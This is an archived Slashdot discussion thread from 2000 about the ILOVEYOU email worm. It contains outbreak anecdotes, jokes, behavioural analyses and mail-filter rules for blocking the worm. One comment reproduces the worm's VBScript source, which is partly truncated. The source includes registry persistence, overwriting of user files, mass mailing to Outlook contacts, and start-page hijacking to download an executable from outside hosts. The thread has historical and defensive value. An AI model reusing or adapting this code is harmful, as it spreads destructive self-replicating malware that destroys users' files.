I Love You "Virus" Hates Everyone 519
Loquis was the first of seven billion readers to submit this story about the I Love You Virus and the UK. Its not really a virus: its a trojan that proclaims its love for the recipient and requests that you open its attachment. On a first date even! It then loves you so much that it sends copies of itself to everyone in your addressbook (slut!) and starts destorying files on your drive. Course they estimate that it's infected 10% of the UK. Pine/Elm/Mutt users as always laugh maniacally as the trojan shuffles countless wasted packets over saturated backbones filling overworked SMTP servers everywhere. Sysadmins are seen weeping in the alleys. Update: 05/04 03:12 by CT : My Roommate Kurt "The Pope" DeMaagd has written a
better summary of the trojan and more importantly a HOWTO fix it. Windows users only ;) Requires registry hacking, so its not for everyone.
This hit where I work. (Score:4)
So far, I've received (estimated) about fifty copies of the damn thing. It's funny, in a "well, hey, look - a train wreck" sort of way.
Dunno about the virus... (Score:4)
Clean up (Score:4)
As far as i know, the virus started out in Asia (somewhere) and made its way to Europe and now the US (Including many millitary installations as well).
Sites I've found that offer disenfectants are a post on ZDNet http://www.zdnet.com/tlkbck/comment/22/0,7056,8875 4-421758,00.html, as well as http://www.f-source.com
good luck people
Re:This hit where I work. (Score:2)
I should really be compiling a list of the coworkers I'm receiving this from. It always pays to know where stupidity is in the org chart.
Maybe this can get companies to consider UNIX? (Score:3)
UNIX would not have a problem here..
Maybe in the long run though - but at least a virus would "only" be able to do what the user can do - not nuke the system.
People still have to be dumb enough to open the attachment.
I got it..... (Score:3)
Re:Looks a bit like Melisa (Score:4)
Total Cost of ownership if Outlook/Exchange (Score:5)
Well Damn (Score:2)
Re:OPening e-mail attachments (Score:5)
Personally, I loved the quote from the journalist who said that she was suspicious when she received 5 copies of it, but since the last one was from Dow Jones, she opened it anyway...
---
Solution for Postfix (Score:5)
header_checks = regexp:/etc/postfix/header_checks
Add the following line in /etc/postfix/header_checks:
This will reject mails containing this subject.
Thanks to Claus Guttesen who posted this on the postfix mailling list.
Source at ftp://weazel.student.utwente.nl/pub/ (Score:2)
Fast spread, but better handled? (Score:2)
Pretty Nasty actually (Score:5)
It mails to everyone in your Outlook addressbook, not just 50. Also your MIRC nick list. It trawls all your mounted directories copying itself over all MP3's JPEGS .jpgs, style sheets and .js files amongst others
This actually managed to knock out half of our office , as well as render one of our live web servers pretty messed up , within under 10 minutes of the first person activating it. Yes, the webserver was a linux box, but one unfortunate had a subtree on a server that mirrored stuff to it mounted over a samba share
And no, you didn't have to click on it. That damn preview pane was enough to trigger it off.
E-mail too versatile? (Score:2)
Either that, or people need to stop using the address books, which are for lusers anyway! :o)
It's hitting all over Europe. (Score:2)
My job's sysadmin has already warned us that the virus was in the wild somewhere, and has asked us *not* to open anything suspicious.
I know that several large firms in my area are also scrambling to stop the infection. This virus can stop any MS system dead in its tracks and clog the others beyond repair. Tough little one!
Outlook Strikes Again. (Score:2)
Next step: AutoEducation.exe (Score:3)
The recipient then falls into one of three classes:
1) Can't get/read virus.
2) Can get/read virus and gets stung (and appended to list).
3) Can get/read virus, doesn't get stung, recieved handy list of idiot coworkers.
This list can be used in a multitude of ways:
1) Reduce headcount
2) List of gullible fools who will buy $2 candy bars "to send the Girl Scouts to the Moon"
3) Identify users who need "training" (sit in a small hot room with each other and an instructor who does nothing but taunt them for their hunt-n-pecking)
--
Have Exchange users? Want to run Linux? Can't afford OpenMail?
*sob* (Score:3)
Re:Analysis (Score:5)
It's a VBS worm. It spreads by two methods, irc and email.
On startup it sets the registry key
HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout
to 0
It then copies itself to WINNT/SYSTEM32/MSKernel32.vbs
WINNT/Win32DLL.vbs
WINNT/SYSTEM32/LOVE-LETTER-FOR-YOU.TXT
It then creates registry keys
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\C
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\C
which will run the script again on the next boot of the computer
Next it checks to see if ie download directory is set in the registry
- if it is it remembers that value, otherwise it uses c:\ instead.
It then checks to see it
it sets internet explorers start page to download a file called WIN-BUGSFIX.exe from one of 4 places (randomly chosen) on www.skyinet.net
It then checks to see it this file has been downloaded (i.e. when the script is run at a later date). If it has to sets this
Next, it generates the file WINNT/SYSTEM32/LOVE-LETTER-FOR-YOU.HTM
This basically contains the worm itself set to run when the page is
viewed.
Now it does to old trick of openning the Outlook address book, grabbing
*all* the entries in it and emailing then an email with the subject line "ILOVEYOU" and the worm as an attachment.
Now it has a look around all the drives on the machine (local drives I think) as does the following
a) If it find mirc, edits it's ini file so when you next log onto an
irc channel it dcc's itself to all the other users
b) Overwrites any
c) If it finds any vbs, vbe, css,, wsh, sct or hta files it deletes them,
creates a new file with the same name ending in vbs and copies itself to
it
d) Does similar things to (c) to
Then the script ends
Stuart
Re:Total Cost of ownership if Outlook/Exchange (Score:2)
Here is the Visual Basic Script that is "ILOVEYOU" (Score:5)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Mic
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs"
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Mic
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerh
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflf
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGR
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklN
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eqfolderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1=
scriptini.WriteLine "n2=
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,reg
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Softwar
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Softwa
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FO
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malea
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.A
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.A
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="LOVELETTER - HTML"&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
"
This HTML file need ActiveX Control
To Enable to read this HTML fileh r(91)) c hr(93)) h r(37)) Y OU.HTM") U .HTM",2)
- Please press #-#YES#-# button to Enable ActiveX"&vbcrlf& _
"----------z--------------------z---------- "&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+c
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+c
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YO
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
Linux version (Score:2)
Stop being so arrogant. It's just an executable attachment.
For a linux version just write a bash script that'll read the users address book and send it on aswell.
This is one reason NOT to want world domination. In that case it'll spread easily
------------------------------------------------ -
"If I can shoot rabbits then I can shoot fascists" -
Re:OPening e-mail attachments (Score:2)
As I understand it (second hand), if the mail shows up in a preview pane in Outlook Express, then the script runs without user intervention.
Now *that* is crappy design...
--
Microsoft Announcement (Score:3)
--
SEATTLE (AP) -- In response to the "ILOVEYOU" virus, Microsoft has announced that they are changing the name of their popular e-mail program to "Microsoft Lookout!"
"Really, what else could we do?" said Steve Ballmer, president of Microsoft. "I mean, first the Melissa virus, and then this. Sure, we probably should plug these security holes in Outlook -- whoops, make that Lookout! -- but we felt the name change was the most proactive step we could take short of releasing better programs."
"At least the virus didn't say 'BILLGATESLOVEYOU'," he added. "Geez, that could've been bad."
--
Sargent
Re:Solution for Postfix (Score:5)
HSubject: $>local_check_header_subject
D{loveletterMessage}"553 Your message may contain a worm."
Slocal_check_header_subject
RILOVEYOU $#error $: ${loveletterMessage}
to your sendmail.cf (version > 8.9 !).
(there is a tab between the ILOVEYOU and $#error.)
/ol (credits go to a cow-orker, though)
Re:E-mail too versatile? (Score:2)
--
A "freaking free-loading Canadian" stealing jobs from good honest hard working Americans since 1997.
Re:Bad Worm. (Score:2)
I think it's seen as being an easy way evil hackers can get at your machine, especially as people (and the media) don't seem to realise that the user has to open the email - it doesn't happen automatically. And, as an automatic it-comes-from-cyberspace-to-take-over-your-machin
Funniest thing I've read in years! (Score:4)
"It crashed all the computers," said Daphne Ghesquiere, a Dow Jones spokeswoman in Hong Kong. "You get the message and the topic says ILOVEYOU, and I was among the stupid ones to open it. I got about five at one time and I was suspicious, but one was from Dow Jones Newswires, so I opened it."
Once the message was opened, Ghesquiere said, it began sending the virus to other e-mail addresses within the Dow Jones computers, blocking people's ability to send and receive e-mail. Victims sometimes received dozens of e-mails, all contaminated.
"I have no idea how it got through the firewall," Ghesquiere said. "It's supposed to be protected." (emphasis mine)
The acticle even has a screen shot of the oh-so-unsuspicious attachment: "LOVE-LETTER-FOR-YOU.TXT.vbs".
Now, I'm generally all for grandmothers sending email and not-everyone-should-have-to-be-able-to-configure-
I mean, I'm joking of course.
Or at least I think I'm joking...
Re:This hit where I work. (Score:2)
disapointed (Score:2)
Of course the "IT staff" referred to it as a "hacker attack" *sigh* Without fail I look in my inbox every time these e-mail "viruses" hit and I'm disappointed with the # of cow-workers whom I communicate with who seemed fairly intelligent to me, up until this very point.
What a Maron (Score:2)
rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
The Cure of the ills of Democracy is more Democracy.
mail server filters (Score:2)
That should be the standard approach at any site that runs Windows.
Re:OPening e-mail attachments (Score:2)
The file is an ATTACHMENT. In order for it to run, the user has to doubleclick it. It would be like sending a unix user a perl script that had rm -rf ~/* in it.
Of course, your typical unix user probably wouldnt run such a file, but that isnt an application design issue.
Re:Maybe this can get companies to consider UNIX? (Score:2)
--
Re:Remember to blame Microsoft! (Score:2)
Re:Total Cost of ownership if Outlook/Exchange (Score:5)
Curiously, can we file suit if one of these things gets really nasty? The last one that hit us just sent the person to a p0rn site and everyone in their addr book, reg keys, desktop, startup. What if this had been a formating virii? Talk about large scale data loss.
-Malachi-
Re:Linux version (Score:2)
> attachment.
Er, yes, but Pine/Elm/Mutt etc, do not run attachments automatically, don't include a programming language within the application itself, and aren't really susceptable to this sort of thing.
Go ahead. Write a bash script. But you would have to be a COMPLETE idiot to run an unknown shell script, or any unknown application, recieved in e-mail. You certainly wouldn't get this kind of instant mass destruction.
jf
(Laughing manically!)
Re:Total Cost of ownership if Outlook/Exchange (Score:2)
Can't agree with you more. (Score:2)
Ahh, the joys of Eudora on a Mac. I just sat back and laughed.
Pope
Freedom is Slavery! Ignorance is Strength! Monopolies offer Choice!
About ILOVEYOU (Score:5)
So what is it and what does it do?
It's a VBScript file using the Windows Script Host runtime (wscript.exe), which is on any W98 or W2k systems, plus those with IE4 or higher (plus several other products install it).
It propagates using OLE Automation against Outlook (any version), propagating both to Lists and individual addresses (internal function spreadtoemail()
It dicks with the registry to make one of four URL's at skyinet.net ending in /WIN-BUGFIX.exe into IE's start page (IE only as it uses IE's registry entries to do this).
Replaces any file of types vbs, vbe, js, jse, css, wsh, sct, hta, jpg, jpeg, mp2, mp3 with a copy of itself.
Places copies of itself into \windows and \windows\system as win32DLL.vbs and MSkernel32.vbs and tweaks the registry so that these are loaded at startup
builds a webpage and displays it, including a request for the user to disable ActiveX security.
If you're non Win32 it's totally irrelevant. If you're Win32 but don't use Outlook it'll bugger about with some files but won't propagate. If you're Windows All The Way then it's trouble.
Not only don't i like his coding style, but he doesn't even realize you can encode vbs files for obfuscation.
It's hit 340 lists at our firm so far.
TomV
Re:quick fix (Score:2)
does anybody know what the MS-BUGFIX.EXE file
Re:Pretty Nasty actually (Score:5)
--
Don't throw your computers out the windows. Throw the Windows out of
your computers.
I LOVE YOU TOO! (Score:2)
mail for the National Institutes of Health is down (Score:2)
Some of this was my employer's idea, as well. (The migration, not the virus.)
Basically, even though 90% of the machines I support are not affected, everybody has to go without mail because they've turned off the Exchange server. I FUCKING FUCKING FUCKING hate Outlook!
REMEMBER! (Score:2)
LoveLetter worm: the full rundown (Score:5)
Files created/edited:
MSKernel32.vbs [created in System folder, copy of worm]
Win32DLL.vbs [created in Windows folder, copy of worm]
LOVE-LETTER-FOR-YOU.TXT.vbs [created in System folder, copy of worm]
LOVE-LETTER-FOR-YOU.HTM [created in System folder, web page with worm embedded in it]
WIN-BUGSFIX.exe [downloaded into default IE download folder]
WinFAT32.exe [created in System folder by WIN-BUGSFIX32.exe, unknown purpose]
*.vbs, *.vbe [overwritten with copy of worm]
*.js, *.jse, *.css, *.wsh, *.sct, *.hta [deleted, replaced with copy of worm with name <filename>.vbs]
*.jpg, *.jpeg [deleted, replaced with copy of worm with name <filename>.<ext>.vbs]
*.mp3, *.mp2 [hidden attribute set, copy of worm with name <filename>.<ext>.vbs created]
script.ini [if found in a directory with mIRC, overwritten with a script to output the HTML version of the worm to other users]
Registry keys created/edited:
HKLM\Software\Microsoft\Windows\CurrentVersion\Ru
HKLM\Software\Microsoft\Windows\CurrentVersion\Ru
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page [altered to attempt to download WIN-BUGSFIX.exe on browser startup]
HKLM\Software\Microsoft\Windows\CurrentVersion\Ru
HKCU\Software\Microsoft\WAB\... [one entry per address book entry plus a running total used during email propagation]
From all this you can work out the basic intention of the worm. It spreads via email propagation to everyone in your address book and by being sent via mIRC to other users. It maintains its hold on a machine by putting copies of itself in the Run and RunServices registry folders and by copying itself to files that look like existing files on the machine (presumably hoping the user has Hide Known File Extensions enabled).
I'm not sure about the
Other info: the file orginates in Manila, Philippines according to comments in the worm, the email title it uses is 'ILOVEYOU' and the email text reads 'kindly check the attached LOVELETTER coming from me.'
Work is never fun (Score:2)
I would imagine that a great number of the
Umm, okay, I COULD be wrong... (Score:3)
In defense of scripting in mail. (Score:3)
What I mean is this. I did my internship at a government agency which pays old age pension and child benefits in The Netherlands. They used alot of the VB possibilities you find in Office. The espescially build a very tight integration between their e-mail and the database that they have. Because they did this in this way, they were able to streamline the organisation in a great way. Alot of stuff could be streamlined through the organisation without the need for prints and reprints etc. Thankfully they had a security-officer that would refused to open up the network to the internet and decided to install one internet terminal per department. (I hope they still have that policy)
What I meant to say was that in stead of laughing at all those people using MS-products and having problems with this VB-script, we should come up with a solution that is alot safer and gives companies the same ease of use of integrating it into their organisation.
Re:Total Cost of ownership if Outlook/Exchange (Score:2)
This is why if a company is going to use a large corporate email system they should choose Lotus Notes over exchange any day. While notes can run script on the opening of an email it has to be (unless someone is stupid enough to change the default settings) signed by a trusted sender. Atleast someone in your organisation who is an administrator.
A virus such as this simply would not propagate between organisations with notes. At the worst it might screw up that organisations mail system, but if an admin really wanted to do damage their are much easier ways.
Anyway just my $0.02.
Re:Linux version (Score:2)
Need I remind you of all the email viruses that spread precisely because people were complete idiots, and ran unknown applications recieved in email. Take the HAPPY99.EXE virus, for example. My mother (admitted, a bit dim when it comes to computers) got this one, in spite of having been warned numerous times not to click on these things.
--
A "freaking free-loading Canadian" stealing jobs from good honest hard working Americans since 1997.
Re:Total Cost of ownership if Outlook/Exchange (Score:2)
Administrator's advice:Training of users (Score:2)
An unharmfull version of it, that is, which only sends a reply back to the administrator. This way, he/she can warn the user for not ever opening anything he/she does know know of.
Of course, the administrator will have to fake his e-mail addy, but that shouldn't be hard
Just an idea... don't count on the web becoming virus-less... take countermeasurements.
Re:Linux version (Score:2)
That is EXACTLY what is happening. By default, Outlook will NOT run an attachment "automagically". It actually CANNOT be configured to run an attachment automatically, the user HAS to double click it.
TOO BAD (Score:2)
Re:Netscape Messenger (Score:2)
You'll receive it from Outlook users, it'll mess with a variety of filetypes and offer them on mIRC if you've got it installed, but it won't propagate, since it uses
to get at the Address book.Open source viruses, eh?
TomV
Re:Pretty Nasty actually (Score:2)
Re:Microsoft Announcement (Score:2)
Another reason to avoid Msft products... (Score:2)
Something along the lines of the devil's dictionary of an absolute monarch: He can do anything he pleases, so long as he pleases the assassins.
Re:Funniest thing I've read in years! (Score:4)
So, she gets a love letter over a newswire, and that allays her suspicions?
--
Definitions (Score:2)
Visual Basic files used by webmasters
I feel that anyone calling themselves a master of the web, but who uses VB, probably has some issues.
Re:Dunno about the virus... (Score:2)
simple fix (Score:3)
There is a really quite simple fix for this, it comes down to basic security that should be praticed at all times. For example, this worm (among others) spreads it's disease though the use of the address book in outlook express.
This address book contants email addresses that the person enjoys send/receiving email with. You could say, the address contains a list of "freinds" to the user. The best way to fix being "labeled" as a "freind" is to use words like "I hate you" and "get away from me", spitting, cursing and talking bad about the pope also are some basic security measures you can take to avoid being put into this "address book" which will be used to send virii/worms to.
Also since this is spread though the use of outlook express, which is an email program. Email programs are used to communicate between to users or person. I can only conclude that communication between humans, in any form is a major security risk and should be stoped.
The two basic security prinicpals we learned here, is
1) communication between humans is bad and should not be allowed
2) be a complete jerk so that even if rule one is broken, you will still have a "fail safe" method in which people will avoid communicatioins with you.
More on ZDNet (Score:2)
Re:quick fix (Score:5)
I've not looked thoroughly (just a quick look with a disassembler at parts of it), so the following is incomplete, but among other things, it looks as though it can:
It seems incredibly poorly written. For example, lots of functions return a char* pointing to a local array. Extra padding arrays are added in an attempt to stop the stack from getting overwritten before the value is used.
Re:E-mail too versatile? (Score:2)
--
Tried writing this in MS Word (Score:5)
Nice to see some innovation at work here...
Microsoft: Don't Innovate, Regurgitate!
Re:Microsoft Announcement (Score:2)
Rename it to DOJDROPSLAWSUIT.doc.vbs and see how long msn.com responds to pings.
--
Re:Pretty Nasty actually (Score:2)
This damn thing brought down 3 mail servers, and a handful of other servers.
It's nice to know that something like a mail message can cripple an organization like EDS.
Re:Here is the Visual Basic Script that is "ILOVEY (Score:5)
WASHINGTON, D.C. (Reuters) - The "I Love You" e-mail virus, which has crippled hundreds of businesses and ISPs in the U.K., has been traced to an American computer discussion site. "We were baffled as to where this deadly new threat had come from," said Richard Josephs of the FBI's computer crimes division, "until we learned that the source code to the virus was available on Slashdot.org." "Source code" refers to the computer-language instructions that a programmer "compiles" to produce a wide variety of applications, from Microsoft Word to Microsoft Excel.
The FBI was informed of the code at 8:03 Wednesday by a courageous anonymous hero, who claimed he has been monitoring the slashdot.org page for evidence of illegal activity ever since it published the "source code" for DeCSS, a program invented by hackers to illegally copy and resell copyrighted DVDs over the Web.
The Department of Justice is preparing to file charges against the hacker-friendly slashdot.org, despite protests from its owners. One, a shadowy figure known only as "CmdrTac0" claims that the source code could have come from anyone who received the virus. But experts say this is unlikely, because there is no known way to keep Microsoft Outlook from launching the virus program upon receipt.
We have been unable to find the anonymous hero who reported the presence of the code on Slashdot.org, but the FBI official who spoke with him said he repeatedly asked if they had the unlisted phone number of actress Natalie Portman.
Re:Next step: AutoEducation.exe (Score:3)
--
Re:Total Cost of ownership if Outlook/Exchange (Score:3)
--
Don't throw your computers out the windows. Throw the Windows out of
your computers.
Re:solution for sendmail? anyone? (Score:2)
/etc/procmailrc:
:0
*Subject: (ILOVEYOU|INEEDYOU)
/home/mail/virus-slr
:0c
of course, you may wish to change the location of the file that all the mails are diverted to.
This will forward all the emails with the subject of ILOVEYOU or INEEDYOU into the file virus-slr.
so far - its a 12Mb file!
Your Sendmail fix works fine (Score:3)
Pete.
Re:Fixed announced for the ILOVEYOU virus (Score:2)
Now, here's hoping a benevolent moderator passes by and mods the parent of this up where it belongs.
Re:Total Cost of ownership if Outlook/Exchange (Score:2)
So, add on to your total cost of ownership the stupidity tax: it's non-refundable. And in your calculations, don't forget the opportunity cost of stupidity: if your users got the time Outlook wasted back, they'd have more time simply to figure out some other way to screw up.
Re:Dunno about the virus... (Score:2)
Back when Melissa was big, I had a co-worker who got an e-mail from his sister warning about how bad Melissa was, and not to open attachments with whatever subject line Melissa had.
Upon further inspection, his sister had mailed not only him, but everyone in her address book.
In other words, out of ignorance or lack of wanting to even think about what she was doing, my co-worker's sister had done the exact same thing as the virus would have.
I think some more education is in order, when people warning about viruses become more annoying than the viruses themselves.
This makes me wonder about Linux.... (Score:2)
One of the reasons that the government thinks it'd be a good thing to break Microsoft up the way they want to, is that without having an OS division, MS-Apps would do things like port Office to Linux.
Red Hat, among others, sees this as a good thing, since the #1 reason they get for people not wanting to switch over to linux is "I can't use my (.DOC |
I think about the porting of Office to Linux and see many others adopting Linux as a result. I then see clueless newbies who run as root all the time opening
And if MS-Apps ports Office over, why not Outlook? Right now, most folks think it's fairly rare to see a virus on Linux. If Microsoft ports Office/Outlook over, and clueless newbies/managers get ahold of it, the scarcity of viruses for Linux will vanish.
I can see the headlines now: "Melissa ported to Linux!"
I think I'll stick to Pine
Re:Total Cost of ownership if Outlook/Exchange (Score:2)
I don't know... I'm sure at least a couple of mail servers sending this message around are running sendmail
I still think the arrogance that it can't happen to us is dangerous. Just wait until someone makes a shell script for Linux that searches your Pine/Elm/whatever address book and spreads itself that way (before finishing with a 'rm -rf ~'). That would be particularaly messy.
Re:About ILOVEYOU (Score:2)
this from securityfocus.com
"The virus appears to have originated from the Philippines and has been described by one expert as the 'the most beautifully written virus' he's ever seen. "
some expert...
Consequences... (Score:3)
[Disclaimer: I didn't actually. Being at a Unix-only place definitely has good sides.]
Re:Someone please explain.. (Score:2)
That's simple. They work for one of the many corporations whose CIO has been assimilated by Microsoft, resulting in the mandatory use of Microsoft Windows, Office and Exchange. If you use Exchange for a mail server, you need Outlook on the client machines. My company recently "upgraded" from MS Mail to Exchange. The LAN Admins installed Outlook on every user's PC. I asked them why they didn't install some UNIX POP3 servers and save a ton of money. They said the deployment of Exchange was corporate policy, at the highest level.
E-mail smarter than people? (Score:2)
Taking a biological view of it, you can see that what many trumpet as "standardization of platform" may create efficiencies for developers, but also for viruses. Any biologist knows that a genetic monoculture is subject to sudden and massive extinction. Imagine a virus that simply and truly wiped disks clean of windows; that it was 100% virulent and contagious; if not for non-windows users, there could be no computers left running. Or take the recent hacking of AboveNet; it was characterized as a denial of service attack, but it wasn't bandwidth flood. It seems to have been something that allowed routers to be taken down; it's easy to see that the severity of the assault would be proportional to the uniformity of their routers.
Vive la difference or die.
Boss of nothin. Big deal.
Son, go get daddy's hard plastic eyes.
Re:Total Cost of ownership if Outlook/Exchange (Score:2)
It certainly does seem to be a great DDoS opportunity! Maybe anybody with VBScript knowledge should be locked away as a potential hacker?
--Jim
Stacking dynamite (Score:5)
That's all well and good, but I wish they'd keep in mind that he wouldn't have been able to do any of this mischief without the months of labour on the part of Microsoft engineering that laid the groundwork for this sort of thing. OLE, VB, Outlook, etc all working together to help viruses propogate.
It's as if Microsoft has been stacking tubes of dynamite in the town hall for months, and one day some fruitcake comes in with a lit match. Sure, the fruitcake is guilty, but there's some serious negligence here as well...
Jeremy, your friendly Slashdot anti-M$ zealot
Now THIS is funny - it was faxed to me (Score:5)
Then news of this virus starts going around, and I look closely at the fax. It says it "originated from a (COMPANY NAME) Faxcom," and has the attachment "LOVE-LETTER-FOR-YOU.TXT.vbs . Apparently, our fax number was in her computer, and it faxed us a text copy of the virus. Anyone want it? :)
-brennan
Virdect Announced! (Score:2)
WASHINGTON:
U.S. District Judge Thomas Penfield Jackson has issued a ruling in the Microsoft VS the Department Of Justice case regaring the breakup of Microsoft into 2 or possibly 3 'Baby Bills'.
Judge Jackson was quoted as saying, "Only moments ago, I received a rather bizaar email from Mr. Gates, titled as "I LOVE YOU" in the subject line. At first, I thought it was perhaps just another plea to 'let [him] innovate', but after opening the attachment, I found myself infected with a virus. I am very upset with Mr. Gates."
The breakup is to proceed immediatly.
